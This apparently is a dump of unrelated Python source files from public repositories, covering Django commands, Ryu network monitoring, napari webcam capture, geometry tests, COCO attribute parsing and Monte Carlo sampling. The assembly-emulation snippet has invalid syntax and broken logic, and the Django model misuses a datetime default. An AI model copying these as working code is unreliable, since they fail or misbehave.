outcome = self.process_row(row)
outcome_counts[outcome or 'processed'] += 1
if count % 100 == 0:
print_outcome_counts_and_rate(
outcome_counts, start_time)
class ShapefileImportCommand(BaseCommand):
help = 'Import data from a *.shp file'
def add_arguments(self, parser):
parser.add_argument('shp_filename', type=str, nargs='+')
def process_record(self, record):
pass
def handle(self, *args, **options):
shp_filenames = options['shp_filename']
outcome_counts = defaultdict(int)
start_time = time.time()
for shp_filename in shp_filenames:
self.process_shapefile(shp_filename,
outcome_counts,
start_time)
def process_shapefile(self, shp_filename, outcome_counts, start_time):
print('Processing shapefile {}'.format(shp_filename))
shp_reader = shapefile.Reader(shp_filename)
for count, record in enumerate(shp_reader.iterShapeRecords()):
if record.shape.shapeType == shapefile.NULL:
outcome_counts['no shapefile'] += 1
continue
outcome = self.process_record(*record.record,
record.shape.__geo_interface__)
outcome_counts[outcome or 'processed'] += 1
if count % 100 == 0:
print_outcome_counts_and_rate(outcome_counts, start_time)
| StarcoderdataPython |
1627451 | <filename>examples/streamtube_demo1.py<gh_stars>0
#!/usr/bin/env python
# Example taken from:
# http://www.mathworks.com/access/helpdesk/help/techdoc/ref/streamtube.html
from scitools.easyviz import *
from scipy import io
wind = io.loadmat('wind_matlab_v6.mat')
x = wind['x']
y = wind['y']
z = wind['z']
u = wind['u']
v = wind['v']
w = wind['w']
sx,sy,sz = ndgrid([80]*4,seq(20,50,10),seq(0,15,5),sparse=False)
setp(show=False)
streamtube(x,y,z,u,v,w,sx,sy,sz)
daspect([1,1,1])
view(3)
axis('tight')
shading('interp')
#camlight(); lighting('gouraud')
setp(show=True)
show()
figure()
# alternative syntax:
streamtube(x,y,z,u,v,w,sx,sy,sz,
daspect=[1,1,1],
view=3,
axis='tight',
shading='interp')
raw_input('Press Return key to quit: ')
#hardcopy('tmp_streamtube1.eps')
#hardcopy('tmp_streamtube1.png')
| StarcoderdataPython |
122604 | from django.db import models
from datetime import datetime
class TestModel(models.Model):
date = models.DateField(default=datetime.today())
| StarcoderdataPython |
4834316 | from todo.constants import COMMANDS
from todo.parser.base import BaseParser
class InitializeConfigParser(BaseParser):
"""
usage: td init-config
td ic
initialize config
optional arguments:
-h, --help show this help message and exit
"""
command = COMMANDS.INITIALIZE_CONFIG
| StarcoderdataPython |
1696795 | import logging
import json
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller import dpset
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.exception import RyuException
from ryu.ofproto import ofproto_v1_3
from ryu.lib import ofctl_v1_3
from ryu.app.wsgi import ControllerBase
from ryu.app.wsgi import Response
from ryu.app.wsgi import WSGIApplication
LOG = logging.getLogger('ryu.app.ofctl_rest')
# supported ofctl versions in this restful app
supported_ofctl = {ofproto_v1_3.OFP_VERSION: ofctl_v1_3}
class CommandNotFoundError(RyuException):
message = 'No such command : %(cmd)s'
class PortNotFoundError(RyuException):
message = 'No such port info: %(port_no)s'
def monitor_method(method):
def wrapper(self, req, dpid, *args, **kwargs):
# Get datapath instance from DPSet
try:
dp = self.dpset.get(int(str(dpid), 0))
except ValueError:
LOG.exception('Invalid dpid: %s', dpid)
return Response(status=400)
if dp is None:
LOG.error('No such Datapath: %s', dpid)
return Response(status=404)
# Check OpenFlow 1.3 support
try:
ofctl = supported_ofctl.get(dp.ofproto.OFP_VERSION)
except KeyError:
LOG.exception('Unsupported OF version: %s',
dp.ofproto.OFP_VERSION)
return Response(status=501)
# Invoke MonitorController method
try:
ret = method(self, req, dp, ofctl, *args, **kwargs)
return Response(content_type='application/json',
body=json.dumps(ret))
except ValueError:
LOG.exception('Invalid syntax: %s', req.body)
return Response(status=400)
except AttributeError:
LOG.exception('Unsupported OF request in this version: %s',
dp.ofproto.OFP_VERSION)
return Response(status=501)
return wrapper
class MonitorController(ControllerBase):
def __init__(self, req, link, data, **config):
super(MonitorController, self).__init__(req, link, data, **config)
self.dpset = data['dpset']
self.waiters = data['waiters']
def get_switches(self, req, **_kwargs):
dps = list(self.dpset.dps.keys())
body = json.dumps(dps)
return Response(content_type='application/json', body=body)
@monitor_method
def get_sw_details(self, req, dp, ofctl, **kwargs):
tmp_sw_details = ofctl.get_desc_stats(dp, self.waiters)
sw_id = list(tmp_sw_details.keys())[0]
return tmp_sw_details[sw_id]
@monitor_method
def get_sw_flows(self, req, dp, ofctl, **kwargs):
flow = req.json if req.body else {}
tmp_flows = ofctl.get_flow_stats(dp, self.waiters, flow)
sw_flows = sw_id = list(tmp_flows.keys())[0]
return tmp_flows[sw_flows][0]
#return ofctl.get_flow_stats(dp, self.waiters, flow)
@monitor_method
def get_flows_stats(self, req, dp, ofctl, **kwargs):
flow = req.json if req.body else {}
return ofctl.get_aggregate_flow_stats(dp, self.waiters, flow)
@monitor_method
def get_table_stats(self, req, dp, ofctl, **kwargs):
return ofctl.get_table_stats(dp, self.waiters)
@monitor_method
def get_sw_ports(self, req, dp, ofctl, **kwargs):
tmp_sw_port = ofctl.get_port_stats(dp, self.waiters, None)
sw_id = list(tmp_sw_port.keys())[0]
return tmp_sw_port[sw_id]
#return ofctl.get_port_stats(dp, self.waiters, port)
@monitor_method
def get_sw_port(self, req, dp, ofctl, port=None, **kwargs):
tmp_sw_port = ofctl.get_port_stats(dp, self.waiters, port)
sw_id = list(tmp_sw_port.keys())[0]
return tmp_sw_port[sw_id][0]
#return ofctl.get_port_stats(dp, self.waiters, None)
@monitor_method
def get_sw_ports_details(self, req, dp, ofctl, **kwargs):
return ofctl.get_port_desc(dp, self.waiters, None)
@monitor_method
def get_sw_port_detail(self, req, dp, ofctl, port, **kwargs):
#return ofctl.get_port_desc(dp, self.waiters, port)
tmp = ofctl.get_port_desc(dp, self.waiters, port)
sw_id = list(tmp.keys())[0]
my_dict = tmp[sw_id]
my_port = int(port)
final_json = {}
LOG.info("MYPORT={}".format(port))
for x in my_dict:
tmp_json = x
LOG.info("PORT={}".format(tmp_json["port_no"]))
if tmp_json["port_no"] == 'LOCAL':
continue
else:
tmp_port = int(tmp_json["port_no"])
if my_port == tmp_port:
LOG.info("TRUE")
return tmp_json
return final_json
class RestMonitorApi(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {
'dpset': dpset.DPSet,
'wsgi': WSGIApplication
}
def __init__(self, *args, **kwargs):
super(RestMonitorApi, self).__init__(*args, **kwargs)
self.dpset = kwargs['dpset']
wsgi = kwargs['wsgi']
self.waiters = {}
self.data = {}
self.data['dpset'] = self.dpset
self.data['waiters'] = self.waiters
mapper = wsgi.mapper
wsgi.registory['MonitorController'] = self.data
# BASE endpoint URL
path = '/monitor'
# GET /monitor/switches - list all switches
uri = path + '/switches'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_switches',
conditions=dict(method=['GET']))
# GET /monitor/switch/detail/<dpid> - summary details of switch
uri = path + '/switch/{dpid}/details'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_details',
conditions=dict(method=['GET']))
# GET /monitor/switch/flows/<dpid> - aggregate flows stats of switch
uri = path + '/switch/{dpid}/flows'
mapper.connect('monitor', uri,
controller=MonitorController,
action='get_sw_flows',
conditions=dict(method=['GET', 'POST']))
# GET /monitor/switch/<dpid>/ports - all ports stats of switchi
uri = path + '/switch/{dpid}/ports'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_ports',
conditions=dict(method=['GET']))
# GET /monitor/switch/<dpid>/port/<port> - single ports stats of switch
uri = path + '/switch/{dpid}/port/{port}'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_port',
conditions=dict(method=['GET']))
# GET /monitor/switch/<dpid>/portdetails - port details of switch
uri = path + '/switch/{dpid}/portdetails'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_ports_details',
conditions=dict(method=['GET']))
uri = path + '/switch/{dpid}/portdetail/{port}'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_port_detail',
conditions=dict(method=['GET']))
@set_ev_cls([ofp_event.EventOFPStatsReply,
ofp_event.EventOFPDescStatsReply,
ofp_event.EventOFPFlowStatsReply,
ofp_event.EventOFPAggregateStatsReply,
ofp_event.EventOFPPortStatsReply,
ofp_event.EventOFPPortDescStatsReply
], MAIN_DISPATCHER)
def stats_reply_handler(self, ev):
msg = ev.msg
dp = msg.datapath
if dp.id not in self.waiters:
return
if msg.xid not in self.waiters[dp.id]:
return
lock, msgs = self.waiters[dp.id][msg.xid]
msgs.append(msg)
flags = dp.ofproto.OFPMPF_REPLY_MORE
if msg.flags & flags:
return
del self.waiters[dp.id][msg.xid]
lock.set()
| StarcoderdataPython |
1749245 | #!/usr/bin/env python
from __future__ import print_function
import sys
import json
import logging
from argparse import ArgumentParser
from util import get_url, post_and_wait, tagmapping
def imageName2id(imageName):
#
url='image/importation?name={0}'.format(imageName)
response = get_url(url)
return response['response'][0]['imageUuid']
def distribute(imageUuid, *deviceIdList):
body = []
for deviceId in deviceIdList:
body.append({"deviceUuid": deviceId, "imageUuid": imageUuid})
url = 'image/distribution'
response = post_and_wait(url, body)
print(response)
taskId = response['id']
detail = get_url('image/task?taskUuid={0}'.format(taskId))
print (json.dumps(detail, indent=2))
def validate(imageUuid, *deviceIdList):
'''
quick check to make sure the image should be distributed to the device
:param imageUuid:
:param deviceIdList:
:return:
'''
image = get_url('image/importation/{0}'.format(imageUuid))
print(image['response']['family'])
for deviceId in deviceIdList:
device = get_url('network-device/{0}'.format(deviceId))
print(device['response']['series'])
if __name__ == "__main__":
parser = ArgumentParser(description='Select options.')
parser.add_argument('--tag', type=str, required=False,
help="devices that match this tag")
parser.add_argument('--image', type=str, required=False,
help="devices that match this tag")
args = parser.parse_args()
deviceIds = tagmapping(args.tag)
imageId = imageName2id(args.image)
validate(imageId, *deviceIds)
distribute(imageId, *deviceIds)
| StarcoderdataPython |
118156 | import requests
import json
from tokens.settings import BLOCKCYPHER_API_KEY
def register_new_token(email, new_token, first=None, last=None):
assert new_token and email
post_params = {
"first": "MichaelFlaxman",
"last": "TestingOkToToss",
"email": "<EMAIL>",
"token": new_token,
}
url = 'https://api.blockcypher.com/v1/tokens'
get_params = {'token': BLOCKCYPHER_API_KEY}
r = requests.post(url, data=json.dumps(post_params), params=get_params,
verify=True, timeout=20)
assert 'error' not in json.loads(r.text)
return new_token
| StarcoderdataPython |
186522 | #!/usr/bin/env python
'''
0104 89C3 MOV BX,AX
0106 D1E8 SHR AX,1
010C 91 XCHG AX,CX
010D BA0102 MOV DX,0201
0110 D1C2 ROL DX,1
0112 D1EB SHR BX,1
0114 D1D1 RCL CX,1
0116 38DE CMP DH,BL
0118 7EF6 JLE 0110
011A 38D3 CMP BL,DL
011C 7E06 JLE 0124
0120 D1D1 RCL CX,1
0124 28D4 SUB AH,DL
0126 4A DEC DX
0127 20D0 AND AL,DL
0129 21F2 AND DX,SI
012B 38C2 CMP DL,AL
012D 18E3 SBB BL,AH
'''
global carry = 0
global equal = 0
global less = 0
global greater = 0
global ax = 0
global bx = 0
global cx = 0
global dx = 0
def and8(x,y)
x1 = ('00000000' + x)[-8:]
y1 = ('00000000' + y)[-8:]
return (x1 & y1)
def sbb(x):
pass
def dec(x):
return x-=1
def sub(x,y):
bl = x-y
def jmp1():
bx = ax
ax = shr(ax)
cx = ax
dx = 201
dx = rol(dx)
bx = shr(bx)
cx = rcl(cx)
carry = 0
cmp8()
if less == 1 or equal == 1:
jmp1()
cmp8()
if less == 1 or equal == 1:
jmp2()
cx = rcl(cx)
jmp2()
def jmp2():
sub()
dx = dec(dx)
#and
#and
cmp8()
def cmp8(x, y):
if x == y:
equal = 1
if x < y:
less = 1
def ror(x):
pass
def rol(x):
return (x[-1] + x)[0:-1]
def shr(x):
return x >> 1
def rcl(x):
c = carry
carry = x[0]
return (x+c)[1:]
if __name__ == "__main__":
ax = int(raw_input())
jmp1()
| StarcoderdataPython |
127608 | from ground.base import (Location,
Relation)
from hypothesis import given
from orient.planar import (point_in_multisegment,
point_in_polygon,
point_in_segment,
segment_in_multisegment,
segment_in_polygon,
segment_in_segment)
from clipping.planar import (complete_intersect_multisegment_with_polygon,
intersect_multisegment_with_polygon)
from tests.utils import (PolygonWithMultisegment,
are_compounds_similar,
compound_to_linear,
is_non_shaped,
pack_non_shaped,
reverse_compound_coordinates,
reverse_multisegment,
reverse_multisegment_coordinates,
reverse_multisegment_endpoints,
reverse_polygon_border,
reverse_polygon_coordinates,
reverse_polygon_holes,
reverse_polygon_holes_contours,
segments_relation,
to_contour_segments,
to_polygon_contours,
to_sorted_segment)
from . import strategies
@given(strategies.polygons_with_multisegments)
def test_basic(polygon_with_multisegment: PolygonWithMultisegment) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
assert is_non_shaped(result)
@given(strategies.polygons_with_multisegments)
def test_properties(polygon_with_multisegment: PolygonWithMultisegment
) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
result_points, result_segments = pack_non_shaped(result)
assert all(point_in_multisegment(point, multisegment) is Location.BOUNDARY
for point in result_points)
assert all(point_in_polygon(point, polygon) is Location.BOUNDARY
for point in result_points)
assert all(any(point_in_segment(point, segment) is Location.BOUNDARY
for point in result_points)
or any(segments_relation(segment, result_segment)
is Relation.TOUCH
for result_segment in result_segments)
for segment in multisegment.segments
if (segment_in_polygon(segment, polygon)
is Relation.TOUCH
and all(
segments_relation(segment, contour_segment)
in (Relation.CROSS, Relation.DISJOINT,
Relation.TOUCH)
for contour in to_polygon_contours(polygon)
for contour_segment in to_contour_segments(contour))))
assert all(segment_in_multisegment(result_segment, multisegment)
in (Relation.EQUAL, Relation.COMPONENT)
for result_segment in result_segments)
assert all(segment_in_polygon(result_segment, polygon)
in (Relation.COMPONENT, Relation.ENCLOSED, Relation.WITHIN)
for result_segment in result_segments)
assert all(to_sorted_segment(segment) in result_segments
# in case of cross
or any(segment_in_segment(result_segment, segment)
is Relation.COMPONENT
for result_segment in result_segments)
for segment in multisegment.segments
if (segment_in_polygon(segment, polygon)
in (Relation.CROSS, Relation.COMPONENT, Relation.ENCLOSED,
Relation.WITHIN)))
@given(strategies.polygons_with_multisegments)
def test_connection_with_intersect(polygon_with_multisegment
: PolygonWithMultisegment) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
assert (compound_to_linear(result)
== intersect_multisegment_with_polygon(multisegment, polygon))
@given(strategies.polygons_with_multisegments)
def test_reversals(polygon_with_multisegment: PolygonWithMultisegment
) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
assert result == complete_intersect_multisegment_with_polygon(
multisegment, reverse_polygon_border(polygon))
assert result == complete_intersect_multisegment_with_polygon(
multisegment, reverse_polygon_holes(polygon))
assert result == complete_intersect_multisegment_with_polygon(
multisegment, reverse_polygon_holes_contours(polygon))
assert result == complete_intersect_multisegment_with_polygon(
reverse_multisegment(multisegment), polygon)
assert result == complete_intersect_multisegment_with_polygon(
reverse_multisegment_endpoints(multisegment), polygon)
assert are_compounds_similar(
result, reverse_compound_coordinates(
complete_intersect_multisegment_with_polygon(
reverse_multisegment_coordinates(multisegment),
reverse_polygon_coordinates(polygon))))
| StarcoderdataPython |
1714839 | # Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
import pytest
env = Environment()
testdata = [
"{{mark}}{{ bsd }} {{ host }} forward: in:ether1 out:bridge, src-mac 26:5a:4c:57:6e:cc, proto TCP (SYN), 192.168.1.196:62583->10.1.0.0:8000, len 64",
]
# Tue, 15 Jun 2021 02:35:28 +1000
@pytest.mark.parametrize("event", testdata)
def test_routeros(record_property, setup_wordlist, setup_splunk, setup_sc4s, event):
host = "test-mrtros-{}-{}".format(
random.choice(setup_wordlist), random.choice(setup_wordlist)
)
dt = datetime.datetime.now(datetime.timezone.utc)
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
epoch = epoch[:-7]
device_time = dt.strftime("%a, %d %b %Y %H:%M:%S +0000")
mt = env.from_string(event + "\n")
message = mt.render(mark="<132>", bsd=bsd, host=host, device_time=device_time)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string('search index=netfw _time={{ epoch }} sourcetype="routeros"')
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
| StarcoderdataPython |
4840222 | <reponame>CartoDB/bigmetadata<gh_stars>10-100
def copy_from_csv(session, table_name, columns, csv_stream):
'''
Creates a table, loading the data from a .csv file.
:param session: A SQL Alchemy session
:param table_name: Output table name
:param columns: Dictionary of columns, keys are named, values are types.
:param csv_stream: A stream that reads a CSV file. e.g: a file or a
:class:`CSVNormalizerStream <lib.csv_stream.CSVNormalizerStream>`
'''
with session.connection().connection.cursor() as cursor:
cursor.execute('CREATE TABLE {output} ({cols})'.format(
output=table_name,
cols=', '.join(['{name} {type}'.format(name=k, type=v) for k, v in columns.items()])
))
cursor.copy_expert(
'COPY {table} ({cols}) FROM stdin WITH (FORMAT CSV, HEADER)'.format(
cols=', '.join(columns.keys()),
table=table_name),
csv_stream)
| StarcoderdataPython |
3260886 | <reponame>haesleinhuepf/napari-webcam<gh_stars>0
"""
This module is an example of a barebones QWidget plugin for napari
It implements the ``napari_experimental_provide_dock_widget`` hook specification.
see: https://napari.org/docs/dev/plugins/hook_specifications.html
Replace code below according to your needs.
"""
import time
from napari._qt.qthreading import thread_worker
from napari_plugin_engine import napari_hook_implementation
from qtpy.QtWidgets import QWidget, QHBoxLayout, QPushButton, QLineEdit, QSpinBox, QCheckBox, QGridLayout, QLabel
from magicgui import magic_factory
import cv2
from ._function import acquire
from napari_tools_menu import register_dock_widget
@register_dock_widget(menu="Acquisition > Webcam stream")
class ContinuousAcquisition(QWidget):
def __init__(self, napari_viewer):
super().__init__()
self.viewer = napari_viewer
self.btn = QPushButton("Start Acquisition")
self.btn.clicked.connect(self._on_click)
self.camera_index_spinner = QSpinBox()
self.rgb_checkbox = QCheckBox()
self.setLayout(QGridLayout(self))
self.layout().addWidget(QLabel("Camera"), 0, 0)
self.layout().addWidget(self.camera_index_spinner, 0, 1)
self.layout().addWidget(QLabel("RGB"), 1, 0)
self.layout().addWidget(self.rgb_checkbox, 1, 1)
self.layout().addWidget(self.btn, 2, 1)
#self.layout().addStretch()
self.image_layer = None
self.camera_device = None
self.worker = None
self.acquisition_count = 0
def _on_click(self):
if self.camera_device:
# stop imaging
self.camera_device.release()
self.camera_device = None
self.btn.setText("Start Acquisition")
return
else:
# start imaging
self.acquisition_count += 1
self.camera_device = cv2.VideoCapture(self.camera_index_spinner.value())
self.btn.setText("Stop Acquisition")
# Multi-threaded interaction
# inspired by https://napari.org/docs/dev/events/threading.html
def update_layer(data):
for name, image in data.items():
if image is not None:
try:
# replace layer if it exists already
self.viewer.layers[name].data = image
except KeyError:
# add layer if not
self.viewer.add_image(
image, name=name, blending='additive'
)
@thread_worker
def yield_acquire_images_forever():
while self.viewer.window.qt_viewer: # loop until napari closes
if self.camera_device:
yield {'image' + str(self.acquisition_count): acquire(keep_connection=True, device=self.camera_device, rgb=self.rgb_checkbox.isChecked())}
time.sleep(0.05)
# Start the imaging loop
if self.worker is None:
self.worker = yield_acquire_images_forever()
self.worker.yielded.connect(update_layer)
self.worker.start()
@napari_hook_implementation
def napari_experimental_provide_dock_widget():
return [ContinuousAcquisition]
| StarcoderdataPython |
34381 | <filename>Lab11/BacktrackingRecursive.py
l = ["+", "-"]
def backRec(x):
for j in l:
x.append(j)
if consistent(x):
if solution(x):
solutionFound(x)
backRec(x)
x.pop()
def consistent(s):
return len(s) < n
def solution(s):
summ = list2[0]
if not len(s) == n - 1:
return False
for i in range(n - 1):
if s[i] == "-":
summ -= list2[i + 1]
else:
summ += list2[i + 1]
return summ > 0
def solutionFound(s):
print(s)
n = int(input("Give number"))
list2 = []
for i in range(n):
list2.append(int(input(str(i) + ":")))
backRec([])
| StarcoderdataPython |
141552 | <reponame>Calebu6214/Neighborhood
from django.test import TestCase
from django.contrib.auth.models import User
from .models import *
import datetime as dt
# Create your tests here.
class neighbourhoodTestClass(TestCase):
def setUp(self):
self.kibra = neighbourhood(neighbourhood='kibra')
def test_instance(self):
self.assertTrue(isinstance(self.kibra,neighbourhood))
def tearDown(self):
neighbourhood.objects.all().delete()
def test_save_method(self):
self.kibra.save_neighbourhood()
jirani = neighbourhood.objects.all()
self.assertTrue(len(jirani)>0)
| StarcoderdataPython |
37603 | <reponame>visinf/style-seqcvae<gh_stars>0
import os
import pickle
import numpy as np
from datasets.config_attrib_selection import attrib_selection
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class CocoAttributesReader(object):
def __init__(self, attribs_dir_path: str):
self.attrib_weight_threshold = 0.1
self.attrib_min_appearance = 0
self.attribs_n_max_per_image = 200
# ATTENTION: image2obj_insts, obj_inst2attrib_inst, attrib_inst2attrib_vector still contain elements not appearing in image list
result_read_attributes = self.read_attributes(attribs_dir_path)
self.image_ids = set(result_read_attributes[0])
self.image2obj_insts = result_read_attributes[1]
self.obj_inst2attrib_inst = result_read_attributes[2]
self.attrib_inst2attrib_vector = result_read_attributes[3]
self.ignore_attrib_indices = result_read_attributes[4]
self.attrib_names = result_read_attributes[5]
self.attrib_image_count = result_read_attributes[6]
self.attrib2attrib_inst_count = result_read_attributes[7]
self.n_attribs = len(self.attrib_names)
self.att_counts = np.zeros(self.n_attribs)
for k,v in self.attrib2attrib_inst_count.items():
self.att_counts[k] = v
self.obj_inst2obj_id = load_obj(os.path.join(attribs_dir_path, "obj_inst2obj_id.pkl"))
self.obj_id2obj_name = load_obj(os.path.join(attribs_dir_path, "obj_id2obj_name.pkl"))
def __len__(self) -> int:
return len(self.image_ids)
def __getitem__(self, image_id: int):
obj_insts = self.image2obj_insts[image_id]
#print(obj_insts)
result = []
for obj_inst in obj_insts:
if(obj_inst in self.obj_inst2attrib_inst):
attrib_inst = self.obj_inst2attrib_inst[obj_inst]
try:
attrib_vec = self.attrib_inst2attrib_vector[attrib_inst]
#result.append([obj_inst, attrib_vec]) # attribs as sparse arrays
result.append([obj_inst, list(np.nonzero(attrib_vec)[0])]) # attribs as indizes
#if(attrib_vec.sum() > 0):
#result.append([obj_inst, [self.attrib_names[x] for x in np.nonzero(attrib_vec)[0]]]) # attribs as strings
#result.append([obj_inst, [[self.attrib_names[x], attrib_vec[x]] for x in np.nonzero(attrib_vec)[0]]])
except:
pass
return result
def filter_duplicates(self, result):
result_filtered = {}
for obj in result:
if(obj[0] not in result_filtered):
result_filtered[obj[0]] = obj[1]
else:
result_filtered_atts = [a[0] for a in result_filtered[obj[0]]]
for attrib in obj[1]:
try:
idx = result_filtered_atts.index(attrib[0])
result_filtered[obj[0]][idx][1] = max(result_filtered[obj[0]][idx][1], attrib[1])
except ValueError:
result_filtered[obj[0]].append(attrib)
return [[key, value] for key, value in result_filtered.items()]
def read_attributes(self, attribs_dir_path, ignore_attrib_indices=None):
attrib_inst2attrib_vector = load_obj(os.path.join(attribs_dir_path, "attrib_inst2attrib_vector.pkl"))
attrib_inst2obj_inst = load_obj(os.path.join(attribs_dir_path, "attrib_inst2obj_inst.pkl"))
obj_inst2attrib_inst = load_obj(os.path.join(attribs_dir_path, "obj_inst2attrib_inst.pkl"))
obj_inst2image = load_obj(os.path.join(attribs_dir_path, "obj_inst2image.pkl"))
image2obj_insts = load_obj(os.path.join(attribs_dir_path, "image2obj_insts.pkl"))
attrib2string = load_obj(os.path.join(attribs_dir_path, "attrib2string.pkl"))
attrib_names = []
for key in sorted(attrib2string.keys()):
attrib_names.append(attrib2string[key])
# =============================================================================
# for a in attrib_names:
# b = a.split(" ")[-1]
# if not b:
# b = a.split(" ")[-2]
# print(b + " " + b + " ")#, a.split(" "))
# =============================================================================
# remove ignored attributes from attribute name list
attrib_selection_list = np.array(list(attrib_selection.values()), dtype=int)
attrib_ignore_selection_idxs = np.argwhere(attrib_selection_list == 0)
attrib_names = np.delete(attrib_names, attrib_ignore_selection_idxs).tolist()
attrib2attrib_inst_count = {}
attrib_image_count = {}
attrib2images = {}
for att_id, atts in list(attrib_inst2attrib_vector.items()):
instance_id = attrib_inst2obj_inst[att_id]
try:
coco_id = obj_inst2image[instance_id]
except:
del attrib_inst2attrib_vector[att_id]
continue
# remove ignored attributes from attribute arrays
atts = np.delete(atts, attrib_ignore_selection_idxs)
#atts = (atts * attrib_selection_list)
idxs_larger = np.argwhere(atts >= self.attrib_weight_threshold)
idxs_larger = [idx[0] for idx in idxs_larger]
idxs_too_small = atts < self.attrib_weight_threshold
# set attribute values in attribute array to zero if smaller than threshold
atts[idxs_too_small] = 0.0
attrib_inst2attrib_vector[att_id] = atts
# add larger attributes to count dict and attrib2images dict
for idx in idxs_larger:
if(idx not in attrib2attrib_inst_count):
attrib2attrib_inst_count[idx] = 1
else:
attrib2attrib_inst_count[idx] += 1
if(idx not in attrib2images):
attrib2images[idx] = {coco_id}
else:
attrib2images[idx].add(coco_id)
# generate image count dict for attribute appearance
for att_id, image_ids in attrib2images.items():
attrib_image_count[att_id] = len(image_ids)
# detect attributes with count lower than threshold
if(ignore_attrib_indices is None):
ignore_attrib_indices = []
for att_id, count in attrib_image_count.items():
if(count < self.attrib_min_appearance):
ignore_attrib_indices.append([att_id])
elif(not ignore_attrib_indices):
raise ValueError("no ignore_attrib_indices is given.")
attrib_names = np.delete(attrib_names, ignore_attrib_indices).tolist()
for image_id, obj_insts in image2obj_insts.items():
attrib_insts = []
for obj_inst in obj_insts:
if(obj_inst in obj_inst2attrib_inst):
attrib_insts.append(obj_inst2attrib_inst[obj_inst])
attrib_vectors = []
rem_list = []
for attrib_inst in attrib_insts:
if(attrib_inst in attrib_inst2attrib_vector):
attrib_vectors.append(attrib_inst2attrib_vector[attrib_inst])
else:
rem_list.append(attrib_inst)
for attrib_inst in rem_list:
attrib_insts.remove(attrib_inst)
atts = np.sum(attrib_vectors, axis=0)
idxs_larger = np.argwhere(atts > 0)
idxs_larger = [idx[0] for idx in idxs_larger]
n_attribs = min(len(idxs_larger), self.attribs_n_max_per_image)
atts_count = np.ones(atts.shape) * 99999
for idx in idxs_larger:
atts_count[idx] = attrib_image_count[idx]
final_attribs_idxs = np.argsort(atts_count)[:n_attribs]
for attrib_inst in attrib_insts:
atts_new = np.zeros(atts.shape)
for idx in final_attribs_idxs:
atts_new[idx] = attrib_inst2attrib_vector[attrib_inst][idx]
attrib_inst2attrib_vector[attrib_inst] = atts_new
# remove attributes from dicts which appear in less than config.attrib_min_appearance
attrib2attrib_inst_count = {}
attrib2images = {}
for att_id, atts in attrib_inst2attrib_vector.items():
instance_id = attrib_inst2obj_inst[att_id]
coco_id = obj_inst2image[instance_id]
atts = np.delete(atts, ignore_attrib_indices)
attrib_inst2attrib_vector[att_id] = atts
idxs_larger = np.argwhere(atts > 0)
idxs_larger = [idx[0] for idx in idxs_larger]
for idx in idxs_larger:
if(idx not in attrib2attrib_inst_count):
attrib2attrib_inst_count[idx] = 1
else:
attrib2attrib_inst_count[idx] += 1
if(idx not in attrib2images):
attrib2images[idx] = {coco_id}
else:
attrib2images[idx].add(coco_id)
attrib_image_count = {}
for att_id, image_ids in attrib2images.items():
attrib_image_count[att_id] = len(image_ids)
# extract image id list only containing images with not ignored attributes and containing at leat one attribute
image_ids = set(image_id for set_ in attrib2images.values() for image_id in set_)
# ATTENTION: image2obj_insts, obj_inst2attrib_inst, attrib_inst2attrib_vector still contain elements not appearing in image list
return list(image_ids), image2obj_insts, obj_inst2attrib_inst, attrib_inst2attrib_vector, ignore_attrib_indices, attrib_names, attrib_image_count, attrib2attrib_inst_count
| StarcoderdataPython |
3230487 | # Autores:
# <NAME> (<EMAIL>)
# <NAME> (<EMAIL>)
import random, math
alturaCilindro = 1/2
ptosCircunfCilindro = 0
ptosCircunfCentro = 0
ptosCircunfInferior = 0
ptosCircunfSuperior = 0
ptosRuedaEsferica = 0
radioCircunfCilindro = 1/2
radioCircunfSuperior = 2
radioCircunfCentro = 4
radioCirunfInferior = 1
radioRuedaEsferica = 1/3
nsim=2000000
#def f(x, y):
# return math.sqrt(radioCircunfCentro**2 - x**2 -y**2)
def volumenCubo(lado):
return lado**3
def volumenEsferaParaError(radio):
return 4/3*math.pi*radio**3
for i in range(0,nsim):
x=random.uniform(0, 1) #U(0,1/2)
y=random.uniform(0, 1) #U(0,1/2)
if x**2 + y**2 <= radioCircunfCilindro**2:
ptosCircunfCilindro += 1
x=random.uniform(0, radioCircunfSuperior) #U(0,2)
y=random.uniform(0, radioCircunfSuperior) #U(0,2)
z=random.uniform(0, radioCircunfSuperior) #U(0,2)
if x**2 + y**2 + z**2 <= radioCircunfSuperior**2:
ptosCircunfSuperior += 1
x=random.uniform(0, radioCircunfCentro) #U(0,4)
y=random.uniform(0, radioCircunfCentro) #U(0,4)
z=random.uniform(0, radioCircunfCentro) #U(0,4)
if x**2 + y**2 + z**2 <= radioCircunfCentro**2:
ptosCircunfCentro += 1
x=random.uniform(0, radioCirunfInferior) #U(0,1)
y=random.uniform(0, radioCirunfInferior) #U(0,1)
z=random.uniform(0, radioCirunfInferior) #U(0,1)
if x**2 + y**2 + z**2 <= radioCirunfInferior**2:
ptosCircunfInferior += 1
